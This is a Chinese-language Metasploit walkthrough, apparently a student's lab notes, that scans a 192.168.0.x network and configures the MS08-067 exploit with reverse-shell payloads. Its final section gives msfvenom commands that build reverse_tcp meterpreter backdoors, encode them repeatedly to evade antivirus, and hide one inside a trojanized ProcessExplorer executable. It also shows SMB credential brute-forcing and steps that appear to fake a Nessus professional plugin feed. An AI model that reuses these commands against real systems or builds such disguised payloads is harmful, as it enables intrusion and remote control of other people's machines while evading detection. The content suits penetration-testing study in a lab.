Interact with a module by name or index. For example info 7, use 7 or use auxiliary/scanner/http/wordpress_pingback_access
msf6 > use auxiliary/scanner/portscan/syn
msf6 auxiliary(scanner/portscan/syn) > set rhost 192.168.0.106
rhost => 192.168.0.106
msf6 auxiliary(scanner/portscan/syn) > set threads 100
threads => 100
msf6 auxiliary(scanner/portscan/syn) > run
[+] TCP OPEN 192.168.0.155:135
[+] TCP OPEN 192.168.0.155:139
[+] TCP OPEN 192.168.0.155:445
…速度很慢,135、139、445…端口打开
利用辅助模块
辅助模块
查看目录
# cd /usr/share/metasploit-framework/modules/auxiliary
# ll
总用量 108
drwxr-xr-x 47 root root 4096 6月 24 17:25 admin
drwxr-xr-x 2 root root 4096 6月 24 20:36 analyze
drwxr-xr-x 2 root root 4096 6月 24 20:36 bnat
drwxr-xr-x 8 root root 4096 6月 24 17:25 client
drwxr-xr-x 4 root root 4096 6月 24 17:25 cloud
drwxr-xr-x 2 root root 4096 6月 24 20:36 crawler
drwxr-xr-x 2 root root 4096 6月 24 20:36 docx
drwxr-xr-x 27 root root 4096 6月 24 17:25 dos
-rwxr-xr-x 1 root root 1473 6月 16 23:59 example.py
-rw-r--r-- 1 root root 1708 6月 16 23:59 example.rb
drwxr-xr-x 2 root root 4096 6月 24 20:36 fileformat
drwxr-xr-x 10 root root 4096 6月 24 17:25 fuzzers
drwxr-xr-x 2 root root 24576 6月 24 20:36 gather
drwxr-xr-x 2 root root 4096 6月 24 20:36 parser
drwxr-xr-x 3 root root 4096 6月 24 17:25 pdf
drwxr-xr-x 87 root root 4096 6月 24 17:25 scanner
drwxr-xr-x 4 root root 4096 6月 24 20:36 server
drwxr-xr-x 2 root root 4096 6月 24 20:36 sniffer
drwxr-xr-x 9 root root 4096 6月 24 17:25 spoof
drwxr-xr-x 5 root root 4096 6月 24 17:25 sqli
drwxr-xr-x 2 root root 4096 6月 24 20:36 voip
drwxr-xr-x 5 root root 4096 6月 24 17:25 vsploit查看模块
msf6 > show auxiliary
Auxiliary
=========
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/2wire/xslt_password_reset 2007-08-15 normal No 2Wire Cross-Site Request Forgery Password Reset Vulnerability
1 auxiliary/admin/android/google_play_store_uxss_xframe_rce normal No Android Browser RCE Through Google Play Store XFO
2 auxiliary/admin/appletv/appletv_display_image normal No Apple TV Image Remote Control
3 auxiliary/admin/appletv/appletv_display_video normal No Apple TV Video Remote Control
4 auxiliary/admin/atg/atg_client normal No Veeder-Root Automatic Tank Gauge (ATG) Administrative Client
5 auxiliary/admin/aws/aws_launch_instances normal No Launches Hosts in AWS
6 auxiliary/admin/backupexec/dump normal No Veritas Backup Exec Windows Remote File Access
7 auxiliary/admin/backupexec/registry normal No Veritas Backup Exec Server Registry Access
8 auxiliary/admin/chromecast/chromecast_reset normal No Chromecast Factory Reset DoS
9 auxiliary/admin/chromecast/chromecast_youtube normal No Chromecast YouTube Remote Control
10 auxiliary/admin/db2/db2rcmd 2004-03-04 normal No IBM DB2 db2rcmd.exe Command Execution Vulnerability
11 auxiliary/admin/dcerpc/cve_2020_1472_zerologon normal Yes Netlogon Weak Cryptographic Authentication
…使用辅助模块
msf6> use scanner/http/webdav_scanner案例:搜索不当的SQL Server
msf6 auxiliary(scanner/smb/smb_version) > use auxiliary/scanner/mssql/mssql_ping
msf6 auxiliary(scanner/mssql/mssql_ping) > options
Module options (auxiliary/scanner/mssql/mssql_ping):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD noThe password for the specified username
RHOSTS yes The target host(s), see https://github.com/
rapid7/metasploit-framework/wiki/Using-Meta sploit
TDSENCRYPTION false yes Use TLS/SSL for TDS data "Force Encryption"
THREADS 1yes The number of concurrent threads (max one p
er host)
USERNAMEsanoThe username to authenticate as
USE_WINDOWS_AUTHENT false yes Use windows authentification (requires DOMA
IN option set)
msf6 auxiliary(scanner/mssql/mssql_ping) > set rhost 192.168.0.106
rhost => 192.168.0.106
msf6 auxiliary(scanner/mssql/mssql_ping) > set THREADS 100
THREADS => 100
msf6 auxiliary(scanner/mssql/mssql_ping) > run
[*] 192.168.0.106: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed协议扫描
SSH扫描
msf6 auxiliary(scanner/mssql/mssql_ping) > use auxiliary/scanner/ssh/ssh_version
msf6 auxiliary(scanner/ssh/ssh_version) > set rhost 192.168.0.1/24
rhost => 192.168.0.1/24
msf6 auxiliary(scanner/ssh/ssh_version) > set threads 50
threads => 50
msf6 auxiliary(scanner/ssh/ssh_version) > run
[*] 192.168.0.1/24:22 - Scanned 41 of 256 hosts (16% complete)
[*] 192.168.0.1/24:22 - Scanned 53 of 256 hosts (20% complete)
[*] 192.168.0.1/24:22 - Scanned 82 of 256 hosts (32% complete)
[+] 192.168.0.150:22 - SSH server version: SSH-2.0-OpenSSH_9.0p1 Debian-1 ( service.version=9.0p1 openssh.comment=Debian-1 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH service.cpe23=cpe:/a:openbsd:openssh:9.0p1 os.vendor=Debian os.family=Linux os.product=Linux os.cpe23=cpe:/o:debian:debian_linux:- service.protocol=ssh fingerprint_db=ssh.banner )
[*] 192.168.0.1/24:22 - Scanned 103 of 256 hosts (40% complete)
[*] 192.168.0.1/24:22 - Scanned 149 of 256 hosts (58% complete)
[*] 192.168.0.1/24:22 - Scanned 196 of 256 hosts (76% complete)
[*] 192.168.0.1/24:22 - Scanned 197 of 256 hosts (76% complete)
[*] 192.168.0.1/24:22 - Scanned 245 of 256 hosts (95% complete)
[*] 192.168.0.1/24:22 - Scanned 247 of 256 hosts (96% complete)
[*] 192.168.0.1/24:22 - Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completedFTP扫描
msf6 auxiliary(scanner/ssh/ssh_version) > use auxiliary/scanner/ftp/ftp_version
msf6 auxiliary(scanner/ftp/ftp_version) > set threads 50
threads => 50
msf6 auxiliary(scanner/ftp/ftp_version) > set rhost 192.168.0.1/24
rhost => 192.168.0.1/24
msf6 auxiliary(scanner/mssql/mssql_ping) > use auxiliary/scanner/ftp/ftp_version
msf6 auxiliary(scanner/ftp/ftp_version) > set threads 50
threads => 50
msf6 auxiliary(scanner/ftp/ftp_version) > set rhost 192.168.0.1/24
rhost => 192.168.0.1/24
msf6 auxiliary(scanner/ftp/ftp_version) > run
[*] 192.168.0.1/24:21 - Scanned 45 of 256 hosts (17% complete)
[*] 192.168.0.1/24:21 - Scanned 55 of 256 hosts (21% complete)
[*] 192.168.0.1/24:21 - Scanned 99 of 256 hosts (38% complete)
[+] 192.168.0.106:21 - FTP Banner: '220-FileZilla Server version 0.9.41 beta\x0d\x0a220-written by Tim Kosse (Tim.Kosse@gmx.de)\x0d\x0a220 Please visit http://sourceforge.net/projects/filezilla/\x0d\x0a'
[+] 192.168.0.150:21 - FTP Banner: '220 (vsFTPd 3.0.3)\x0d\x0a'
[*] 192.168.0.1/24:21 - Scanned 104 of 256 hosts (40% complete)
[+] 192.168.0.161:21 - FTP Banner: '220 (vsFTPd 2.3.4)\x0d\x0a'
[*] 192.168.0.1/24:21 - Scanned 144 of 256 hosts (56% complete)
[*] 192.168.0.1/24:21 - Scanned 154 of 256 hosts (60% complete)
[*] 192.168.0.1/24:21 - Scanned 203 of 256 hosts (79% complete)
[*] 192.168.0.1/24:21 - Scanned 205 of 256 hosts (80% complete)
[*] 192.168.0.1/24:21 - Scanned 253 of 256 hosts (98% complete)
[*] 192.168.0.1/24:21 - Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ftp/ftp_version) > use auxiliary/scanner/ftp/anonymous
msf6 auxiliary(scanner/ftp/anonymous) > set rhost 192.168.0.161
rhost => 192.168.0.150
msf6 auxiliary(scanner/ftp/anonymous) > run
[+] 192.168.0.161:21 - 192.168.0.161:21 - Anonymous READ (220 (vsFTPd 2.3.4))
[*] 192.168.0.161:21 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
结论:192.168.0.161的FTP允许匿名登录SNMP扫描
msf6 auxiliary(scanner/ftp/anonymous) > use auxiliary/scanner/snmp/snmp_login
msf6 auxiliary(scanner/snmp/snmp_login) > set rhost 192.168.0.1/24
rhost => 192.168.0.1/24
msf6 auxiliary(scanner/snmp/snmp_login) > set threads 50
threads => 50
msf6 auxiliary(scanner/snmp/snmp_login) > run
[*] Scanned 50 of 256 hosts (19% complete)
[*] Scanned 54 of 256 hosts (21% complete)
[*] Scanned 100 of 256 hosts (39% complete)
[*] Scanned 104 of 256 hosts (40% complete)
[*] Scanned 134 of 256 hosts (52% complete)
[*] Scanned 157 of 256 hosts (61% complete)
[*] Scanned 181 of 256 hosts (70% complete)
[*] Scanned 208 of 256 hosts (81% complete)
[*] Scanned 231 of 256 hosts (90% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completedARP 扫描
msf6 auxiliary(scanner/snmp/snmp_login) > use auxiliary/scanner/discovery/arp_sweep
msf6 auxiliary(scanner/discovery/arp_sweep) > options
Module options (auxiliary/scanner/discovery/arp_sweep):
Name Current Setting Required Description
---- --------------- -------- -----------
INTERFACE no The name of the interface
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
SHOST no Source IP Address
SMAC no Source MAC Address
THREADS 1 yes The number of concurrent threads (max one per host)
TIMEOUT 5 yes The number of seconds to wait for new data
msf6 auxiliary(scanner/discovery/arp_sweep) > set RHOSTS 192.168.0.1/24
RHOSTS => 192.168.0.1/24
msf6 auxiliary(scanner/discovery/arp_sweep) > set THREADS 100
THREADS => 100
msf6 auxiliary(scanner/discovery/arp_sweep) > run
[+] 192.168.0.1 appears to be up (UNKNOWN).
[+] 192.168.0.106 appears to be up (UNKNOWN).
[+] 192.168.0.150 appears to be up (VMware, Inc.).
[+] 192.168.0.151 appears to be up (UNKNOWN).
[+] 192.168.0.152 appears to be up (UNKNOWN).
[+] 192.168.0.158 appears to be up (UNKNOWN).
[+] 192.168.0.159 appears to be up (UNKNOWN).
[+] 192.168.0.161 appears to be up (VMware, Inc.).
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completedHTTP服务扫描
msf6 auxiliary(scanner/discovery/arp_sweep) > use auxiliary/scanner/http/http_version
msf6 auxiliary(scanner/http/http_version) > set RHOSTS 192.168.0.1/24
RHOSTS => 192.168.0.1/24
msf6 auxiliary(scanner/http/http_version) > set THREADS 100
THREADS => 100
msf6 auxiliary(scanner/http/http_version) > run
[+] 192.168.0.1:80
[*] Scanned 44 of 256 hosts (17% complete)
[*] Scanned 55 of 256 hosts (21% complete)
[*] Scanned 78 of 256 hosts (30% complete)
[+] 192.168.0.106:80 Microsoft-HTTPAPI/2.0
[*] Scanned 104 of 256 hosts (40% complete)
[+] 192.168.0.161:80 Apache/2.2.8 (Ubuntu) DAV/2 ( Powered by PHP/5.2.4-2ubuntu5.10 )
[*] Scanned 136 of 256 hosts (53% complete)
[*] Scanned 175 of 256 hosts (68% complete)
[*] Scanned 187 of 256 hosts (73% complete)
[*] Scanned 209 of 256 hosts (81% complete)
[*] Scanned 235 of 256 hosts (91% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completedSMB扫描
SMB:SMB(Server Message Block)通信协议是微软(Microsoft)和英特尔(Intel)在1987年制定的协议,主要是作为Microsoft网络的通讯协议。SMB 是在会话层(session layer)和表示层(presentation layer)以及小部分应用层(application layer)的协议。
SMB使用了NetBIOS的应用程序接口 (Application Program Interface,简称API)。另外,它是一个开放性的协议,允许了协议扩展——使得它变得更大而且复杂;大约有65个最上层的作业,而每个作业都超过120个函数,甚至Windows NT也没有全部支持到,最近微软又把 SMB 改名为 CIFS(Common Internet File System),并且加入了许多新的特色。
SMB(全称是Server Message Block)是一个协议名,它能被用于Web连接和客户端与服务器之间的信息沟通。SMB最初是IBM的贝瑞·费根鲍姆(Barry Feigenbaum)研制的,其目的是将DOS操作系统中的本地文件接口“中断13”改造为网络文件系统
msf6 auxiliary(scanner/http/http_version) > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(scanner/smb/smb_version) > set THREADS 100
THREADS => 100
msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.0.1/24
RHOSTS => 192.168.0.1/24
msf6 auxiliary(scanner/smb/smb_version) > run
[*] 192.168.0.1/24: - Scanned 39 of 256 hosts (15% complete)
[*] 192.168.0.1/24: - Scanned 60 of 256 hosts (23% complete)
[*] 192.168.0.151:445 - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-GCM) (signatures:optional) (guid:{d6d3c52d-ff47-48d3-aa4f-7ac8c44d7d96}) (authentication domain:LAPTOP-PH3NSDV2)
[*] 192.168.0.106:445 - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-GCM) (signatures:optional) (guid:{c4aea85c-fbd7-47a2-b5b5-f6ad41c48b6e}) (authentication domain:DESKTOP-9A8VFKB)
[*] 192.168.0.1/24: - Scanned 104 of 256 hosts (40% complete)
[*] 192.168.0.158:445 - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1) (signatures:optional) (uptime:4d 1h 5m 2s) (guid:{10a33533-6e55-452c-9c62-13561aafa6e1}) (authentication domain:WIN-2VEIIKHJ7M8)
[+] 192.168.0.158:445 - Host is running Windows 7 Home Basic SP1 (build:7601) (name:WIN-2VEIIKHJ7M8) (workgroup:WORKGROUP)
[*] 192.168.0.161:445 - SMB Detected (versions:1) (preferred dialect:) (signatures:optional)
[*] 192.168.0.161:445 - Host could not be identified: Unix (Samba 3.0.20-Debian)
[*] 192.168.0.1/24: - Scanned 107 of 256 hosts (41% complete)
[*] 192.168.0.1/24: - Scanned 159 of 256 hosts (62% complete)
[*] 192.168.0.1/24: - Scanned 161 of 256 hosts (62% complete)
[*] 192.168.0.1/24: - Scanned 203 of 256 hosts (79% complete)
[*] 192.168.0.1/24: - Scanned 206 of 256 hosts (80% complete)
[*] 192.168.0.1/24: - Scanned 254 of 256 hosts (99% complete)
[*] 192.168.0.1/24: - Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed漏洞扫描
Nexpose
# wget http://download2.rapid7.com/download/NeXpose-v4/NeXposeSetup-Linux64.bin
#chmod a+x NeXposeSetup-Linux64.bin
#./NeXposeSetup-Linux64.bin
#cd /opt/rapid7/nexpose/nsc
#./nschttps://127.0.0.1:3780/ 登录页面出来后就ok了。
Nessus
https://blog.csdn.net/qq_51577576/article/details/123211031
1)https://www.tenable.com/downloads/nessus
2)dpkg -i Nessus-10.2.0-debian9_amd64.deb
3)/bin/systemctl start nessusd.service
或
systemctl start nessusd.service
4)https://127.0.0.1:8834/
5)关闭服务:systemctl stop nessusd.service
6)#gedit /opt/nessus/var/nessus/plugin_feed_info.inc
7)添加内容
PLUGIN_SET = "202201250216";
PLUGIN_FEED = "ProfessionalFeed (Direct)";
PLUGIN_FEED_TRANSPORT = "Tenable Network Security Lightning";
8)
# cd /opt/nessus/var/nessus/# mkdir plugins#cp /opt/nessus/var/nessus/plugin_feed_info.inc /opt/nessus/var/nessus/plugins/
9)更新
https://pan.baidu.com/s/11sV9Kk0mbzQkLcXqUKxO_g?pwd=462u
#/opt/nessus/sbin/nessuscli update all-2.0-20220209.tar.gz
msf6 > db_connect postgres:123456@127.0.0.1/msf
[*] Connected to Postgres data service: 127.0.0.1/msf
msf6 >db_status
[*] Connected to msf. Connection type: postgresql. Connection name: local_db_service.
msf6 > db_import /home/jerry/jerry_01sqgv.nessus
[*] Importing 'Nessus XML (v2)' data
[*] Importing host 192.168.0.158
[*] Importing host 192.168.0.157
[*] Importing host 192.168.0.151
[*] Importing host 192.168.0.150
[*] Importing host 192.168.0.106
[*] Importing host 192.168.0.1
[*] Successfully imported /home/jerry/jerry_01sqgv.nessus
msf6 > hosts -c address,svcs,vulns
Hosts
=====
addresssvcs vulns
----------- -----
192.168.0.12 14
192.168.0.106 2376
192.168.0.150 6 46
192.168.0.151 4 28
192.168.0.155 3 2
192.168.0.157 4 29
192.168.0.158 1037address:IP地址
svcs:探测到的服务数量
vulns:Nessus发现到的漏洞个数
展示所有漏洞
msf6 > vulns
专门漏洞扫描
验证SMB登录
msf6 > use auxiliary/scanner/smb/smb_login
msf6 auxiliary(scanner/smb/smb_login) > show options
msf6 auxiliary(scanner/smb/smb_login) > set rhost 192.168.0.106-200
rhost => 192.168.0.106-200
msf6 auxiliary(scanner/smb/smb_login) > set smbuser root
smbuser => root
msf6 auxiliary(scanner/smb/smb_login) > set smbupass 123456
smbupass => 123456
msf6 auxiliary(scanner/smb/smb_login) > ser verbose false
[-] Unknown command: ser
msf6 auxiliary(scanner/smb/smb_login) > run扫描开放的VNC空口令
VNC (Virtual Network Console)是虚拟网络控制台的缩写。它是一款优秀的远程控制工具软件,由著名的 AT&T 的欧洲研究实验室开发的。VNC 是在基于 UNIX 和 Linux 操作系统的免费的开源软件,远程控制能力强大,高效实用,其性能可以和 Windows 和 MAC 中的任何远程控制软件媲美。在 Linux 中,VNC 包括以下四个命令:vncserver,vncviewer,vncpasswd,和 vncconnect。大多数情况下用户只需要其中的两个命令:vncserver 和 vncviewer。
msf6 auxiliary(scanner/smb/smb_login) > use auxiliary/scanner/vnc/vnc_none_auth
msf6 auxiliary(scanner/vnc/vnc_none_auth) > set rhost 192.168.0.106-200
msf6 auxiliary(scanner/vnc/vnc_none_auth) > set threads 100
threads => 100
msf6 auxiliary(scanner/vnc/vnc_none_auth) > run扫描开放的X11服务器
X11也叫做X Window系统,X Window系统 (X11或X)是一种位图显示的视窗系统。它是在 Unix 和类Unix 操作系统,以及 OpenVMS 上建立图形用户界面的标准工具包和协议,并可用于几乎所有已有的现代操作系统。
msf6 auxiliary(scanner/vnc/vnc_none_auth) > use auxiliary/scanner/x11/open_x11
msf6 auxiliary(scanner/x11/open_x11) > set rhost 192.168.0.106/24
rhost => 192.168.0.106/24
msf6 auxiliary(scanner/x11/open_x11) > set threads 100
threads => 100
msf6 auxiliary(scanner/x11/open_x11) > run
[*] 192.168.0.106/24:6000 - Scanned 31 of 256 hosts (12% complete)
[*] 192.168.0.106/24:6000 - Scanned 53 of 256 hosts (20% complete)
[*] 192.168.0.106/24:6000 - Scanned 102 of 256 hosts (39% complete)
[-] 192.168.0.157:6000- 192.168.0.157 Access Denied
[*] 192.168.0.106/24:6000 - Scanned 105 of 256 hosts (41% complete)
[*] 192.168.0.106/24:6000 - Scanned 200 of 256 hosts (78% complete)
[*] 192.168.0.106/24:6000 - Scanned 204 of 256 hosts (79% complete)
[*] 192.168.0.106/24:6000 - Scanned 223 of 256 hosts (87% complete)
[*] 192.168.0.106/24:6000 - Scanned 223 of 256 hosts (87% complete)
[*] 192.168.0.106/24:6000 - Scanned 254 of 256 hosts (99% complete)
[*] 192.168.0.106/24:6000 - Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed开启渗透之旅
msf6常用命令
msf6 >show exploits 显示所有的攻击模块
msf6 > show exploits
Exploits
========
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/aix/local/ibstat_path 2013-09-24 excellent Yesibstat $PATH Privilege Escalation
1 exploit/aix/local/xorg_x11_server 2018-10-25 great YesXorg X11 Server Local Privilege Escalation
2 exploit/aix/rpc_cmsd_opcode21 2009-10-07 great No AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 Buffer Overflow
3 exploit/aix/rpc_ttdbserverd_realpath 2009-06-17 great No ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX)
4 exploit/android/adb/adb_server_exec 2016-01-01 excellent YesAndroid ADB Debug Server Remote Payload Execution
5 exploit/android/browser/samsung_knox_smdm_url 2014-11-12 excellent No Samsung Galaxy KNOX Android Browser RCE
6 exploit/android/browser/stagefright_mp4_tx3g_64bit 2015-08-13 normal No Android Stagefright MP4 tx3g Integer Overflow
…msf6 > show auxiliary
Auxiliary
=========
# Name Disclosure Date RankCheck Description
- ---- --------------- --------- -----------
0 auxiliary/admin/2wire/xslt_password_reset 2007-08-15normal No 2Wire Cross-Site Request Forgery Password Reset Vulnerability
1 auxiliary/admin/android/google_play_store_uxss_xframe_rce normal No Android Browser RCE Through Google Play Store XFO
2 auxiliary/admin/appletv/appletv_display_image normal No Apple TV Image Remote Control
3 auxiliary/admin/appletv/appletv_display_video normal No Apple TV Video Remote Control
4 auxiliary/admin/atg/atg_clientnormal No Veeder-Root Automatic Tank Gauge (ATG) Administrative Client
…msf6 > show options
msf6 > use auxiliary/scanner/x11/open_x11
msf6 auxiliary(scanner/x11/open_x11) > back
msf6 >search mysql
msf6 > search ms08_067
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms08_067_netapi 2008-10-28 great YesMS08-067 Microsoft Server Service Relative Path Stack Corruption
Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/smb/ms08_067_netapi
msf6 exploit(windows/smb/ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTSyes The target host(s), see https://github.com/rapid7/metas
ploit-framework/wiki/Using-Metasploit
RPORT445 yes The SMB service port (TCP)
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, no
ne)
LHOST 192.168.0.150yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf>show payloads
显示某个模块下的payload
msf6 > use exploit/windows/smb/ms08_067_netapi
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > show payloads
使用某个payload
msf6 exploit(windows/smb/ms08_067_netapi) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf>show targets
msf6 exploit(windows/smb/ms08_067_netapi) > show targets
Exploit targets:
Id Name
-- ----
0 Automatic Targeting
1 Windows 2000 Universal
2 Windows XP SP0/SP1 Universal
3 Windows 2003 SP0 Universal
4 Windows XP SP2 English (AlwaysOn NX)
5 Windows XP SP2 English (NX)
…
79 Windows 2003 SP2 Russian (NX)
80 Windows 2003 SP2 Swedish (NX)
81 Windows 2003 SP2 Turkish (NX)显示更详细的show targets内容
msf6 exploit(windows/smb/ms08_067_netapi) > info
Name: MS08-067 Microsoft Server Service Relative Path Stack Corruption
Module: exploit/windows/smb/ms08_067_netapi
Platform: Windows
Arch:
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Great
Disclosed: 2008-10-28
Provided by:
hdm
Brett Moore brett.moore@insomniasec.com
frank2
jduck
Available targets:
Id Name
-- ----
0 Automatic Targeting
1 Windows 2000 Universal
2 Windows XP SP0/SP1 Universal
3 Windows 2003 SP0 Universal
4 Windows XP SP2 English (AlwaysOn NX)
5 Windows XP SP2 English (NX)
…
79 Windows 2003 SP2 Russian (NX)
80 Windows 2003 SP2 Swedish (NX)
81 Windows 2003 SP2 Turkish (NX)
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTSyes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT445 yes The SMB service port (TCP)
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload information:
Space: 408
Avoid: 8 characters
Description:
This module exploits a parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service. This module is capable of bypassing NX on some operating systems and service packs.
The correct target must be used to prevent the Server Service (along with a dozen others in the same process) from crashing. Windows XP targets seem to handle multiple successful exploitation events, but 2003 targets will often crash or hang on subsequent attempts. This is just the first version of this module, full support for NX bypass on 2003, along with other platforms, is still in development.
References:
https://nvd.nist.gov/vuln/detail/CVE-2008-4250 OSVDB (49243)
https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2008/MS08-067
http://www.rapid7.com/vulndb/lookup/dcerpc-ms-netapi-netpathcanonicalize-dosmsf6 exploit(windows/smb/ms08_067_netapi) > set lhost 192.168.0.105
lhost => 192.168.0.105
msf6 exploit(windows/smb/ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTSyes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT445 yes The SMB service port (TCP)
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/shell/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.0.105yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf6 exploit(windows/smb/ms08_067_netapi) > unset lhost
Unsetting lhost...
msf6 exploit(windows/smb/ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTSyes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT445 yes The SMB service port (TCP)
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/shell/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Targeting设置所有模块的lhost
msf6 exploit(windows/smb/ms08_067_netapi) > setg lhost 102.168.0.150
lhost => 102.168.0.150
msf6 exploit(windows/smb/ms08_067_netapi) > unsetg lhost免杀技术
msfvenom
Options:
-l, --list | <type> | 列出[类型]的所有模块。类型包括:有效载荷、编码器、NOP、平台、ARCH、加密、格式等 |
|---|---|---|
-p, --payload | <payload> | 要使用的有效负载(-list payloads to list,-list options for arguments)。为自定义指定“-”或STDIN |
--list-options | 列表——有效载荷的标准、高级和规避选项 | |
-f, --format | <format> | 输出格式(使用--列出要列出的格式) |
-e, --encoder | <encoder> | 要使用的编码器(使用-列出要列出的编码器) |
--service-name | <value> | 生成服务二进制文件时要使用的服务名称 |
--sec-name | <value> | 生成大型Windows二进制文件时要使用的新节名称。默认值:随机4字符alpha字符串 |
--smallest | 使用所有可用编码器生成尽可能最小的有效载荷 | |
--encrypt | <value> | 应用于外壳代码的加密或编码类型(使用--list encrypt to list) |
--encrypt-key | <value> | 用于加密的密钥 |
--encrypt-iv | <value> | 加密的初始化向量 |
-a, --arch | <arch> | 用于--有效负载和--编码器的架构(使用--列出要列出的ARCH) |
--platform | <platform> | 有效负载的平台(使用列出要列出的平台) |
-o, --out | <path> | 将有效负载保存到文件中 |
-b, --bad-chars | <list> | 要避免的字符示例: '\x00\xff' |
-n, --nopsled | <length> | 在有效负载上预先添加一个[length]大小的nopled |
--pad-nops | 使用-n<length>指定的nopled size作为总有效负载大小,自动预加数量的nopled(nops减去有效负载长度) | |
-s, --space | <length> | 产生的有效载荷的最大大小 |
--encoder-space | <length> | 编码有效负载的最大大小(默认为-s值) |
-i, --iterations | <count> | 对有效负载进行编码的次数 |
-c, --add-code | <path> | 指定要包括的其他win32外壳代码文件 |
-x, --template | <path> | 指定要用作模板的自定义可执行文件 |
-k, --keep | 保留--模板行为,并将负载作为新线程注入 | |
-v, --var-name | <value> | 指定用于某些输出格式的自定义变量名 |
-t, --timeout | <second> | 从STDIN读取有效负载时等待的秒数(默认为30,0表示禁用) |
-h, --help | 显示此消息 |
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 10 -f exe -o payload.exe
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=9999 R > test.apk
躲避杀毒软件的监测
使用MSF编码器
# msfvenom -l encoders
Framework Encoders [--encoder]
======================================
x86/shikata_ga_nai excellent Polymorphic XOR Additive Feedback Encoder
x86/single_static_bit manual Single Static Bit
x86/unicode_mixed manual Alpha2 Alphanumeric Unicode Mixedcase Encoder
x86/unicode_upper manual Alpha2 Alphanumeric Unicode Uppercase Encoder
x86/xor_dynamic normal Dynamic key XOR Encodermsfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 10 -f exe -o payload.exe自定义可自行文件模板
wget http://download.sysinternals.com/files/ProcessExplorer.zip(也可以从国内网站上取)
msfvenom -a x86 --platform Windows -x ProcessExplorer/procexp.exe -p windows/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 10 -f exe -o payload1.exe
Found 1 compatible encoders
Attempting to encode payload with 10 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 381 (iteration=0)
x86/shikata_ga_nai succeeded with size 408 (iteration=1)
x86/shikata_ga_nai succeeded with size 435 (iteration=2)
x86/shikata_ga_nai succeeded with size 462 (iteration=3)
x86/shikata_ga_nai succeeded with size 489 (iteration=4)
x86/shikata_ga_nai succeeded with size 516 (iteration=5)
x86/shikata_ga_nai succeeded with size 543 (iteration=6)
x86/shikata_ga_nai succeeded with size 570 (iteration=7)
x86/shikata_ga_nai succeeded with size 597 (iteration=8)
x86/shikata_ga_nai succeeded with size 624 (iteration=9)
